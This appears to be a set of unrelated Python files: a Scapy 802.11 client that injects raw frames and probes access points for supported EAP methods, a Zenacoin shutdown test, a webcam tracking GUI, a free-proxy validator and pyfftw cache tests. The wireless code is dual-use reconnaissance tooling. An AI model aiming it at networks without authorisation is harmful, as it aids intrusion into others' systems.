        # manually after sending. Confirm this asymmetry is intentional.
        SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)
        return unpack('<H', pack('>H', SC))[0]
    def __stopfilter__(self, packet):
        """
        This is the stop filter for Scapy to be used to check if the
        packet was sent to this WirelessStateMachine instance.
        """
        if get_destination(packet) == self.source_mac and get_bssid(packet) == self.bssid: # and real_source == self.dest_mac:
            self.lastpacket = packet
            return True
        self.lastpacket = None
        return False
    def __thread_sniff__(self):
        """
        Sniff function threaded to start before packets are sent
        """
        sniff(iface=self.interface, stop_filter=self.__stopfilter__, timeout=RESPONSE_TIMEOUT)
    def __thread_sendp__(self, payload):
        """
        Sendp function used for opening thread, sending packets, and closing thread
        """
        # Start the sniffer first so the response cannot be missed, then send.
        quick_sniff = threading.Thread(target=self.__thread_sniff__)
        quick_sniff.start()
        time.sleep(0.1)
        sendp(payload, iface=self.interface, verbose=False)
        quick_sniff.join()
    def connect(self, essid, rsnInfo=''):
        """
        Connect/Associate with an access point.
        errDict = {
            -1:"Already Connected",
            0:"No Error",
            1:"Failed To Get Probe Response",
            2:"Failed To Get Authentication Response",
            3:"Failed To Get Association Response",
            4:"Authentication Request Received Fail Response",
            5:"Association Request Received Fail Response"
        }
        """
        # Dot11 Authentication request (open system, seqnum=1).
        payload = (
            RadioTap()/
            Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac)/
            Dot11Auth(seqnum=1)
        )
        self.__thread_sendp__(payload)
        if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
            rsnInfo = self.get_rsn_information(essid)
        if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
            return 2
        if self.lastpacket.getlayer(Dot11Auth).status != 0:
            return 4
        #Dot11 Association Request
        payload = (
            RadioTap()/
            Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=0)/
            Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)/
            Dot11Elt(ID=0, info=essid)/
            Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
            Dot11Elt(ID=50, info='\x0c\x12\x18\x60')/
            rsnInfo
        )
        self.__thread_sendp__(payload)
        if self.lastpacket is None or not self.lastpacket.haslayer(Dot11AssoResp):
            return 3
        if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
            return 5
        self.connected = True
        self.sequence = 0  # reset the data-frame sequence counter
        return 0
    def close(self):
        """
        Disassociate from the access point, This does not verify that
        the AP received the message and should be considered a
        best-effort attempt.
        errDict = {
            -1:"Not Connected",
            0:"No Error"
        }
        """
        if not self.connected:
            return -1
        # Sent twice, best-effort (no acknowledgment is checked).
        sendp(
            RadioTap()/
            Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
            Dot11Disas(reason=3),
            iface=self.interface,
            verbose=False
        )
        sendp(
            RadioTap()/
            Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
            Dot11Disas(reason=3),
            iface=self.interface,
            verbose=False
        )
        self.connected = False
        return 0
    def get_rsn_information(self, essid):
        # Probe for essid and return its re-serialized RSN information
        # element, '' when the AP answered without one, or None on timeout.
        rsnInfo = None
        sendp(
            RadioTap()/
            Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4)/
            Dot11ProbeReq()/
            Dot11Elt(ID=0, info=essid)/
            Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
            Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
            iface=self.interface,
            verbose=False
        )
        self.sequence += 1
        sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
        if self.lastpacket is None or not self.lastpacket.haslayer(Dot11ProbeResp):
            return None
        probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
        tmp = probeResp.getlayer(Dot11Elt)
        while tmp:
            if tmp.fields.get('ID') == 48:  # 48 == RSN information element
                rsnInfo = tmp
                break
            else:
                tmp = tmp.payload
        if rsnInfo is None:
            rsnInfo = '' # Did not find rsnInfo in probe response.
        else:
            # Re-serialize and prepend the element header (ID 0x30 + length).
            rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info))
            rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
        return rsnInfo
    def recv(self, bufferlen=0):
        """
        Read a frame and return the information above the Dot11 layer.
        Returns None on timeout. bufferlen is currently unused.
        """
        sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
        if self.lastpacket:
            return self.lastpacket
        else:
            return None
    def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True):
        """
        Send a frame, if raw, insert the data above the Dot11QoS layer.
        """
        frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype)
        if raw:
            frame = frame/data
        else:
            frame = frame/Dot11QoS()/data
        sendp(frame, iface=self.interface, verbose=False)
        self.sequence += 1
    def shutdown(self):
        """
        Shutdown and disassociate from the AP.
        """
        if self.connected:
            self.close()
        self.__shutdown__ = True
class WirelessStateMachineEAP(WirelessStateMachine):
    """
    This is to keep the EAP functionality separate so the core State-
    Machine can be repurposed for other projects.
    """
    def check_eap_type(self, essid, eaptype, outer_identity='user', eapol_start=False, rsnInfo=''):
        """
        Check that an eaptype is supported.
        errDict = {
            0:"supported",
            1:"not supported",
            2:"could not determine",
            3:"identity rejected"
        }
        """
        eapid = randint(1, 254)
        if eapol_start:
            eapol_start_request = (
                RadioTap()/
                Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
                Dot11QoS()/
                LLC(dsap=170, ssap=170, ctrl=3)/
                SNAP(code=0x888e)/
                EAPOL(version=1, type=1)
            )
            self.sequence += 1
            i = 0
            # NOTE(review): the `i == 2` checks below assume EAP_MAX_TRIES == 3
            # (i is reset to 0 on success, so i == 2 means all tries failed).
            for i in range(0, EAP_MAX_TRIES):
                self.__thread_sendp__(eapol_start_request)
                if not self.lastpacket is None:
                    if self.lastpacket.haslayer('EAP'):
                        fields = self.lastpacket.getlayer('EAP').fields
                        # code == 1 / type == 1 is an EAP Identity Request.
                        if 'type' in fields and fields['type'] == 1 and fields['code'] == 1:
                            i = 0
                            eapid = fields['id']
                            break
            if i == 2:
                return 2
        eap_identity_response = (
            RadioTap()/
            Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
            Dot11QoS()/
            LLC(dsap=170, ssap=170, ctrl=3)/
            SNAP(code=0x888e)/
            EAPOL(version=1, type=0)/
            EAP(code=2, type=1, id=eapid, identity=outer_identity)
        )
        # Legacy NAK proposing the requested eaptype to the authenticator.
        eap_legacy_nak = (
            RadioTap()/
            Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
            Dot11QoS()/
            LLC(dsap=170, ssap=170, ctrl=3)/
            SNAP(code=0x888e)/
            EAPOL(version=1, type=0, len=6)/
            EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype])
        )
        self.sequence += 1
        for i in range(0, EAP_MAX_TRIES):
            self.__thread_sendp__(eap_identity_response)
            if not self.lastpacket is None:
                if self.lastpacket.haslayer('EAP'):
                    fields = self.lastpacket.getlayer('EAP').fields
                    if fields['code'] == 4: # 4 is a failure
                        return 3
                    if 'type' in fields and fields['type'] == eaptype:
                        return 0
                    i = 0
                    break
        if i == 2:
            return 2
        for i in range(0, EAP_MAX_TRIES):
            self.__thread_sendp__(eap_legacy_nak)
            if not self.lastpacket is None:
                if self.lastpacket.haslayer('EAP'):
                    fields = self.lastpacket.getlayer('EAP').fields
                    if 'type' in fields and fields['type'] == eaptype:
                        return 0
                    else:
                        return 1
        return 2
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Zenacoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test zenacoind shutdown."""
from test_framework.test_framework import ZenacoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
    """Block on waitfornewblock and check the reported height is the genesis height."""
    result = node.waitfornewblock()
    assert_equal(result['height'], 0)
class ShutdownTest(ZenacoinTestFramework):
    """Check that zenacoind shuts down cleanly while an RPC call is in flight."""
    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.supports_cli = False
    def run_test(self):
        # Separate proxy with a long timeout so the blocking call below
        # does not time out before shutdown completes.
        node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
        # Force connection establishment by executing a dummy command.
        node.getblockcount()
        Thread(target=test_long_call, args=(node,)).start()
        # Wait until the server is executing the above `waitfornewblock`.
        self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
        # Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure event loop waits for current connections
        # to close.
        self.stop_node(0, wait=1000)
if __name__ == '__main__':
    ShutdownTest().main()
|
examplegui.py | #!/usr/bin/env python
#Note check this out: http://johnroach.info/2011/03/02/image-capturing-from-webcam-using-opencv-and-pygame-in-python/
from __future__ import print_function
import pygtk, math, array, numpy as np
pygtk.require('2.0')
import gtk, gobject, cv, cairo, opencv, multiprocessing, time, Queue
from PIL import Image
import klt, selectGoodFeatures, writeFeatures, trackFeatures
def IplToPilImg(imIpl):
    """Convert a 3-channel BGR IplImage (OpenCV) to an RGB PIL image.

    Raises AssertionError if the image does not have exactly 3 channels.
    """
    assert imIpl.nChannels == 3
    imgSize = cv.GetSize(imIpl)
    # Use the size computed above (it was previously an unused local and
    # cv.GetSize was called a second time). The 'raw' decoder with "BGR"
    # swaps OpenCV's BGR byte order into RGB.
    return Image.fromstring("RGB", imgSize, imIpl.tostring(), 'raw', "BGR")
class WebcamWidget(gtk.Invisible):
    """Polls a webcam from a child process and buffers the captured frames.

    Frames cross the process boundary as numpy arrays on self.fromWorker;
    control messages go the other way on self.toWorker.
    """
    def __init__(self):
        gtk.Invisible.__init__(self)
        self.toWorker, self.fromWorker = multiprocessing.Queue(), multiprocessing.Queue()
        self.buffer = []  # most recent frames, newest last
        self.maxBufferSize = 100
        self.count = 0  # total frames received so far
        # Drain the worker queue ~50 times per second on the gtk main loop.
        gobject.timeout_add(int(round(1000./50.)), self.UpdatePipe)
        self.p = multiprocessing.Process(target=self.PollCamera, args=(self.toWorker,self.fromWorker))
        self.p.start()
    def __del__(self):
        pass
        #self.Stop()
    def Stop(self):
        # Ask the worker to stop, then terminate it regardless.
        self.toWorker.put(("STOP",))
        self.p.terminate()
    def GetCurrentImg(self):
        # Return the newest buffered frame, or None before the first frame.
        if len(self.buffer) == 0:
            return None
        return self.buffer[-1]
    def GetFrameNum(self):
        return self.count
    def UpdatePipe(self):
        # gtk timeout callback: move frames from the worker into the buffer.
        # Returning True keeps the timeout scheduled.
        while not self.fromWorker.empty():
            try:
                pipeData = self.fromWorker.get(0)
                ty = pipeData[0]
                if ty == "FRAME":
                    img = pipeData[1]
                    self.buffer.append(img)
                    self.count += 1
                    # Trim the buffer from the front to cap memory use.
                    while len(self.buffer) > self.maxBufferSize:
                        self.buffer.pop(0)
                    #print(ty, len(self.buffer))
            except Queue.Empty:
                pass
        return True
    def PollCamera(self, toWorker, fromWorker):
        # Runs in the child process: grab frames until a STOP message arrives.
        running = True
        cap = cv.CaptureFromCAM(-1)  # -1 selects the first available camera
        capture_size = (320,200)
        cv.SetCaptureProperty(cap, cv.CV_CAP_PROP_FRAME_WIDTH, capture_size[0])
        cv.SetCaptureProperty(cap, cv.CV_CAP_PROP_FRAME_HEIGHT, capture_size[1])
        #fps = cv.GetCaptureProperty(cap, cv.CV_CAP_PROP_FPS)
        while (running):
            try:
                pipeData = toWorker.get(0)
                #print("Worker",pipeData[0])
                if pipeData[0] == "STOP":
                    running = False
            except Queue.Empty:
                pass
            imIpl = cv.QueryFrame(cap)
            if imIpl is not None:
                pilImg = IplToPilImg(imIpl)
                # #print(pilImg)
                fromWorker.put(("FRAME",np.array(pilImg)))
            time.sleep(1./100.)
        fromWorker.put(("STOPPED",))
        return True
class TrackingProcess:
    """Runs KLT feature tracking in a child process.

    Frames are submitted with TrackFrame(); the latest tracked feature list
    is published back and cached in self.currentTracking.
    """
    def __init__(self):
        self.currentTracking = []  # last feature list received from the worker
        self.toWorker, self.fromWorker = multiprocessing.Queue(), multiprocessing.Queue()
        # Drain the worker queue ~50 times per second on the gtk main loop.
        gobject.timeout_add(int(round(1000./50.)), self.UpdatePipe)
        self.p = multiprocessing.Process(target=self.Process, args=(self.toWorker,self.fromWorker))
        #self.p = multiprocessing.Process(target=Test, args=(pipeChile,))
        self.p.start()
    def __del__(self):
        pass
    def Stop(self):
        self.toWorker.put(("STOP",))
        self.p.terminate()
    def TrackFrame(self, frameArr):
        # Drop frames when the worker is backed up (more than 5 queued).
        if self.toWorker.qsize() < 5:
            self.toWorker.put(("FRAME", frameArr))
    def GetCurrentTracking(self):
        return self.currentTracking
    def UpdatePipe(self):
        # gtk timeout callback; returning True keeps the timeout scheduled.
        try:
            pipeData = self.fromWorker.get(0)
            ty = pipeData[0]
            if ty == "TRACKING":
                tr = pipeData[1]
                self.currentTracking = tr
        except Queue.Empty:
            pass
        return True
    def Process(self, toWorker,fromWorker):
        # Runs in the child process: track features from frame to frame.
        running = True
        currentFrame = None
        tc = klt.KLT_TrackingContext()
        tc.sequentialMode = True
        tc.retainTrackers = True
        fl = []  # current KLT feature list
        prevImg = None
        while running:
            # Consume all pending messages, keeping only the newest frame.
            while not toWorker.empty():
                print(toWorker.empty(), toWorker.qsize())
                try:
                    pipeData = toWorker.get()
                    if pipeData[0] == "STOP":
                        running = False
                    if pipeData[0] == "FRAME":
                        currentFrame = Image.fromarray(pipeData[1])
                except Queue.Empty:
                    pass
                time.sleep(0.01)
            if currentFrame is not None and running:
                nFeatures = 50
                countActive = klt.KLTCountRemainingFeatures(fl)
                # Re-seed features when tracking is lost or on the first frame;
                # otherwise track the existing features into the new frame.
                if countActive == 0 or prevImg is None:
                    fl = selectGoodFeatures.KLTSelectGoodFeatures(tc, currentFrame, nFeatures)
                else:
                    trackFeatures.KLTTrackFeatures(tc, prevImg, currentFrame, fl)
                fromWorker.put(("TRACKING",fl))
                prevImg = currentFrame
                currentFrame = None
            time.sleep(0.01)
class VisualiseWidget(gtk.DrawingArea):
    """Drawing area that shows the current camera frame with tracker points
    overlaid as green dots."""
    def __init__(self):
        gtk.DrawingArea.__init__(self)
        self.image = None  # cairo surface of the current frame
        self.trackerPos = []  # list of (x, y) tracker positions to overlay
        self.set_size_request(100,100)
        self.connect("expose_event", self.expose)
    def expose(self, widget, event):
        self.context = widget.window.cairo_create()
        # set a clip region for the expose event
        self.context.rectangle(event.area.x, event.area.y,
                event.area.width, event.area.height)
        self.context.clip()
        self.draw(self.context)
        return False
    def RedrawCanvas(self):
        # Force an immediate full-widget redraw.
        self.redrawPending = False
        if self.window:
            alloc = self.get_allocation()
            self.queue_draw_area(0, 0, alloc.width, alloc.height)
            self.window.process_updates(True)
    def draw(self, context):
        rect = self.get_allocation()
        x = rect.x + rect.width / 2
        y = rect.y + rect.height / 2
        if self.image is not None:
            context.set_source_surface(self.image,
                0.,
                0.)
            context.paint()
        #Draw tracker points
        context.save()
        context.set_source_rgb(0, 1, 0)
        for pt in self.trackerPos:
            context.arc(pt[0], pt[1], 2., 0. * math.pi, 2. * math.pi)
            context.fill()
        context.restore()
    def SetImageByIpl(self,imIpl):
        #Convert IPL image to PIL image
        #pilImg = opencv.adaptors.Ipl2PIL(imIpl)
        self.SetImageByPil(IplToPilImg(imIpl))
    def SetImageByPil(self, pilImg):
        #Convert PIL image to cairo surface
        pilRaw = array.array('B',pilImg.tostring("raw","BGRX",0,1))
        stride = pilImg.size[0] * 4  # 4 bytes per pixel (BGRX)
        self.image = cairo.ImageSurface.create_for_data(pilRaw, cairo.FORMAT_RGB24,
            pilImg.size[0], pilImg.size[1], stride)
        self.set_size_request(*pilImg.size)
class Base:
    """Main application: wires the webcam, the tracking process and the
    visualisation widget into a single gtk window."""
    def __init__(self):
        self.tc = klt.KLT_TrackingContext()
        self.fl = []
        self.webcam = WebcamWidget()
        self.showingFrame = None  # frame number currently displayed
        self.trackingProcess = TrackingProcess()
        #Create main window
        self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
        self.window.connect("delete_event", self.delete_event)
        self.window.connect("destroy", self.destroy)
        self.window.set_border_width(10)
        self.visArea = VisualiseWidget()
        #self.visArea.set_size_request((100,100))
        #self.visArea.set_from_file("img0.pgm")
        self.window.add(self.visArea)
        self.window.show_all()
        # Refresh the display ~25 times per second.
        gobject.timeout_add(int(round(1000./25.)), self.UpdateImage)
    def delete_event(self, widget, event, data=None):
        # Stop the worker processes before the window goes away.
        self.webcam.Stop()
        self.trackingProcess.Stop()
        print("delete event occurred")
        return False
    def destroy(self, widget, data=None):
        print("destroy window")
        gtk.main_quit()
    def main(self):
        gtk.main()
    def UpdateImage(self):
        # gtk timeout callback; returning True keeps the timeout scheduled.
        #print("x")
        #cv.GrabFrame(self.cap)
        #imIpl = cv.RetrieveFrame(self.cap)
        if self.showingFrame != self.webcam.GetFrameNum():
            img = self.webcam.GetCurrentImg()
            if img is not None:
                self.visArea.SetImageByPil(Image.fromarray(img))
                currentTracking = self.trackingProcess.GetCurrentTracking()
                #print(currentTracking)
                self.visArea.trackerPos = []
                for pt in currentTracking:
                    if pt.val < 0: continue  # skip lost features
                    self.visArea.trackerPos.append((pt.x,pt.y))
                self.visArea.RedrawCanvas()
                self.trackingProcess.TrackFrame(img)
            self.showingFrame = self.webcam.GetFrameNum()
        return True
if __name__ == "__main__":
    base = Base()
    base.main()
|
schedule.py | import time
import json
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
    """Tests raw proxies against TEST_API and stores the working ones in redis."""
    test_api = TEST_API
    def __init__(self):
        self._raw_proxies = None  # proxies waiting to be tested
        self._usable_proxies = []
    def set_raw_proxies(self, proxies):
        self._raw_proxies = proxies
        self._conn = RedisClient()
    async def test_single_proxy(self, proxy):
        """
        Test one proxy; if valid, put it into the usable pool.
        """
        async with aiohttp.ClientSession() as session:
            try:
                if isinstance(proxy, bytes):
                    proxy = proxy.decode('utf-8')
                real_proxy = 'http://' + proxy
                # print('Testing', proxy)
                async with session.get(self.test_api, proxy=real_proxy, timeout=15) as response:
                    # Any HTTP 200 through the proxy counts as a working proxy.
                    if response.status == 200:
                        # rr = await response.read()
                        self._conn.put(proxy)
                        # httpbin_ip = eval(rr.decode('utf-8'))['origin']
                        # print('原:',httpbin_ip)
                        # if len(httpbin_ip.split(','))==1:
                        #     self._conn.put(proxy)
                        #     print('高匿:', proxy)
                        # else:
                        #     self._conn.put(proxy)
                        #     print('透明:', proxy)
                        print('*'*19)
            except (ProxyConnectionError, TimeoutError, ValueError):
                pass
                # print('Invalid proxy', proxy)
    def test(self):
        """
        aio test all proxies.
        """
        print('ValidityTester is working')
        try:
            loop = asyncio.get_event_loop()
            tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
            # asyncio.wait raises ValueError on an empty task list, which the
            # except below absorbs.
            loop.run_until_complete(asyncio.wait(tasks))
        except ValueError:
            print('Async Error')
class PoolAdder(object):
    """
    Top up the proxy pool: crawl free proxy sources, validity-test the
    results, and stop once the pool reaches the configured threshold.
    """
    def __init__(self, threshold):
        # threshold -- upper bound on the number of proxies kept in redis
        self._threshold = threshold
        self._conn = RedisClient()
        self._tester = ValidityTester()
        self._crawler = FreeProxyGetter()
    def is_over_threshold(self):
        """
        Return True when the pool already holds at least the threshold
        number of proxies.
        """
        # Direct boolean return instead of the old if/else True/False.
        return self._conn.queue_len >= self._threshold
    def add_to_queue(self):
        """
        Crawl every registered source, test the proxies and push valid ones
        into the pool until the threshold is met.

        Raises ResourceDepletionError when a full pass over all sources
        yields no proxies at all.
        """
        print('PoolAdder is working')
        proxy_count = 0
        while not self.is_over_threshold():
            for callback_label in range(self._crawler.__CrawlFuncCount__):
                callback = self._crawler.__CrawlFunc__[callback_label]
                raw_proxies = self._crawler.get_raw_proxies(callback)
                # test crawled proxies
                self._tester.set_raw_proxies(raw_proxies)
                self._tester.test()
                proxy_count += len(raw_proxies)
                if self.is_over_threshold():
                    print('IP is enough, waiting to be used')
                    break
            if proxy_count == 0:
                raise ResourceDepletionError
class Schedule(object):
    """Orchestrates pool maintenance: a refresher and a top-up checker,
    each running in its own child process."""
    @staticmethod
    def valid_proxy(cycle=VALID_CHECK_CYCLE):
        """
        Get half of proxies which in redis
        """
        conn = RedisClient()
        tester = ValidityTester()
        while True:
            print('Refreshing ip')
            # Re-test the older half of the pool each cycle.
            count = int(0.5 * conn.queue_len)
            if count == 0:
                print('Waiting for adding')
                time.sleep(cycle)
                continue
            raw_proxies = conn.get(count)
            tester.set_raw_proxies(raw_proxies)
            tester.test()
            time.sleep(cycle)
    @staticmethod
    def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
                   upper_threshold=POOL_UPPER_THRESHOLD,
                   cycle=POOL_LEN_CHECK_CYCLE):
        """
        If the number of proxies less than lower_threshold, add proxy
        """
        conn = RedisClient()
        adder = PoolAdder(upper_threshold)
        while True:
            if conn.queue_len < lower_threshold:
                adder.add_to_queue()
            time.sleep(cycle)
    def run(self):
        """Start both maintenance loops as child processes (never returns
        a handle; the processes run until killed)."""
        print('Ip processing running')
        valid_process = Process(target=Schedule.valid_proxy)
        check_process = Process(target=Schedule.check_pool)
        valid_process.start()
        check_process.start()
|
test_pyfftw_interfaces_cache.py | #
# Copyright 2017 Knowledge Economy Developments Ltd
#
# Henry Gomersall
# heng@kedevelopments.co.uk
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import copy
from pyfftw import interfaces, builders
import pyfftw
import numpy
import numpy as np
import unittest
from .test_pyfftw_base import run_test_suites, miss
from .test_pyfftw_numpy_interface import InterfacesNumpyFFTTestFFT
import threading
import time
import os
import hashlib
'''Test the caching functionality of the interfaces package.
'''
def _check_n_cache_threads_running():
    '''Return how many threads have the name 'PyFFTWCacheThread'.

    Obviously, this isn't production quality, but it should suffice for
    the tests here.
    '''
    # Count with a generator expression instead of a manual accumulator loop.
    return sum(
        1 for each_thread in threading.enumerate()
        if each_thread.name == 'PyFFTWCacheThread')
@unittest.skipIf(*miss('64'))
class InterfacesNumpyFFTCacheTestFFT(InterfacesNumpyFFTTestFFT):
    """Re-run the numpy-interface FFT tests with the plan cache enabled."""
    # (shape, kwargs) pairs exercised by the inherited test machinery.
    test_shapes = (
        ((100,), {}),
        ((128, 64), {'axis': 0}),
        ((128, 32), {'axis': -1}),
        ((32, 64), {}),
    )
    def validate(self, array_type, test_shape, dtype,
                 s, kwargs, copy_func=copy.copy):
        # Do it with the cache
        interfaces.cache.enable()
        # Run twice: the second call should hit the cached plan but must
        # still produce a distinct output array.
        output = self._validate(array_type, test_shape, dtype, s, kwargs,
                copy_func=copy_func)
        output2 = self._validate(array_type, test_shape, dtype, s, kwargs,
                copy_func=copy_func)
        self.assertIsNot(output, output2)
        # Turn it off to finish
        interfaces.cache.disable()
@unittest.skipIf(*miss('64'))
class CacheSpecificInterfacesUtils(unittest.TestCase):
    """Tests for cache behaviour specific to the interfaces._utils layer."""

    def test_slow_lookup_no_race_condition(self):
        '''Checks that lookups in _utils longer than the keepalive time are ok.
        '''
        # Any old size, it doesn't matter
        data_shape = (128,)

        # Monkey patch the module with a custom _Cache object
        _Cache_class = interfaces.cache._Cache

        class _SlowLookupCache(_Cache_class):

            def _lookup(self, key):
                # Delegate to the real lookup implementation.
                return _Cache_class.lookup(self, key)

            def lookup(self, key):
                # Sleep for longer than the keepalive time configured below,
                # so cached entries can expire while a lookup is in flight.
                time.sleep(0.1)
                return self._lookup(key)

        try:
            interfaces.cache._Cache = _SlowLookupCache

            interfaces.cache.enable()

            # something shortish
            interfaces.cache.set_keepalive_time(0.001)

            ar, ai = numpy.random.randn(*(2,) + data_shape)
            a = ar + 1j*ai

            # Both the following should work without exception
            # (even if it fails to get from the cache)
            interfaces.numpy_fft.fft(a)
            interfaces.numpy_fft.fft(a)

            interfaces.cache.disable()

        finally:
            # Revert the monkey patching
            interfaces.cache._Cache = _Cache_class
class InterfacesCacheTest(unittest.TestCase):
    """Tests of the public module-level cache enable/disable controls."""

    def test_missing_threading(self):
        # With the threading module unavailable, enabling the cache
        # must raise ImportError.
        self.assertIsNone(interfaces.cache._fftw_cache)

        saved_threading = interfaces.cache._threading
        interfaces.cache._threading = None
        with self.assertRaises(ImportError):
            interfaces.cache.enable()
        interfaces.cache._threading = saved_threading

    def test_is_enabled(self):
        self.assertIsNone(interfaces.cache._fftw_cache)

        interfaces.cache.enable()
        self.assertTrue(interfaces.cache.is_enabled())

        interfaces.cache.disable()
        self.assertFalse(interfaces.cache.is_enabled())

    def test_cache_enable_disable(self):
        self.assertIsNone(interfaces.cache._fftw_cache)

        interfaces.cache.enable()
        self.assertIsInstance(
            interfaces.cache._fftw_cache, interfaces.cache._Cache)

        interfaces.cache.disable()
        self.assertIsNone(interfaces.cache._fftw_cache)

    def test_set_keepalive_time(self):
        # Without an enabled cache, setting the keepalive time is an error.
        with self.assertRaises(interfaces.cache.CacheError):
            interfaces.cache.set_keepalive_time(10)

        interfaces.cache.enable()
        interfaces.cache.set_keepalive_time(10)
        self.assertEqual(interfaces.cache._fftw_cache.keepalive_time, 10.0)

        interfaces.cache.disable()
class CacheTest(unittest.TestCase):
    """Tests of the _Cache object itself: reaper-thread lifetime,
    insert/lookup, keepalive expiry and alignment keying.

    Several of these tests are timing-sensitive by design.
    """

    def test_cache_parent_thread_ended(self):
        '''Test ending cache parent thread ends cache thread.
        '''
        # Firstly make sure we've exited any lingering threads from other
        # tests.
        time.sleep(0.1)
        self.assertTrue(_check_n_cache_threads_running() == 0)

        def cache_parent_thread():
            # Creating a _Cache spawns a reaper thread tied to the lifetime
            # of this (its parent) thread.
            cache = interfaces.cache._Cache()
            time.sleep(0.5)

        # We give the parent thread the same name as a Cache thread so
        # it is picked up by the cache_threads_running function
        parent_t = threading.Thread(
            target=cache_parent_thread, name='PyFFTWCacheThread')
        parent_t.start()

        time.sleep(0.1)
        # Check it's running
        self.assertTrue(_check_n_cache_threads_running() == 2)

        parent_t.join()
        time.sleep(0.1)
        # Check both threads have exited properly
        self.assertTrue(_check_n_cache_threads_running() == 0)

    def test_delete_cache_object(self):
        '''Test deleting a cache object ends cache thread.
        '''
        # Firstly make sure we've exited any lingering threads from other
        # tests.
        time.sleep(0.2)
        self.assertTrue(_check_n_cache_threads_running() == 0)

        _cache = interfaces.cache._Cache()
        time.sleep(0.2)
        self.assertTrue(_check_n_cache_threads_running() == 1)

        del _cache
        time.sleep(0.2)
        self.assertTrue(_check_n_cache_threads_running() == 0)

    @unittest.skipIf(*miss('64'))
    def test_insert_and_lookup_item(self):
        # Inserting an object and looking it up returns that same object.
        _cache = interfaces.cache._Cache()

        key = 'the key'

        test_array = numpy.random.randn(16)
        obj = builders.fft(test_array)
        _cache.insert(obj, key)

        self.assertIs(_cache.lookup(key), obj)

    @unittest.skipIf(*miss('64'))
    def test_invalid_lookup(self):
        # Looking up a key that was never inserted raises KeyError.
        _cache = interfaces.cache._Cache()

        key = 'the key'

        test_array = numpy.random.randn(16)
        obj = builders.fft(test_array)
        _cache.insert(obj, key)

        self.assertRaises(KeyError, _cache.lookup, 'wrong_key')

    def test_keepalive_time_update(self):
        _cache = interfaces.cache._Cache()
        # The default
